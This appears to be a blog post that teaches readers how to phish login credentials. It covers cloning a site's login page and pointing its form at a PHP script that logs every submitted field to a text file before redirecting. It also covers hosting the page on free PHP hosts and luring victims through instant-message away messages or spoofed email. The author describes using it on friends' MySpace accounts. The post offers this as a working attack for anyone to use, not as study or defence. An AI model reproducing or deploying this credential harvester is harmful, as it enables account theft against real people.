So what exactly is phishing? Well, phishing is getting someone to click on a link to a fake login page that you have made, and getting them to enter their information. You can get them to do this by spoofing an e-mail or sending it to them in an instant message or something. I have tried to make each step as easy to follow as possible so anyone can do it.

1. Decide who and where you want to get into

When I did this myself, I was trying to get into all of my friend's MySpace accounts. Then go to the website you chose, right-click, and View Source.

2. Save the source as login.html

Then open Notepad and paste the following into it:



foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "rn");
}
fwrite($handle, "rn");
fclose($handle);
exit;


Save as data.txt

3. Register at a free webhosting place that will let you use PHP

(I used 100webspace.com) Then register at a place that won't display advertisements on your site. (I used 50webs.com) It would be a good idea to try to login to the website your making a fake of but with a bad password. Copy the link for the error page.

4. Get a program that will let you save as .php

(I used EditPlus2 from http://www.editplus.com) Open the program then copy and paste the following:

<?php
header("Location: someplace.html");
$handle = fopen("data.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "rn");
}
fwrite($handle, "rn");
fclose($handle);
exit;
?>


Now, look at the second line of code. Do you notice '("Location: someplace.html")'? Change someplace.html to the error page. Save as log.php

5. Upload data.txt and log.php at the site that will let you use php

(100webspace.com) Then open login.html in Notepad.
Search for <form action="some file name"> Replace their file name with a link to your log.php. Save and then upload login.html. 

6. Test out your new login page

Load your data.txt from your website(yoururl.hostdomain/data.txt) and it should have your test login listed. You can re-upload data.txt to get rid of your test login information.

Ok now that you have your fake login page done you need to get the people there. The method I chose to do was to make the page different and tell people it was a secret login page. I put it in my away message on AIM and told them if they logged in at that page they would see something cool. Another way is to spoof an email.

0 blogger-facebook:

Post a Comment

 
Top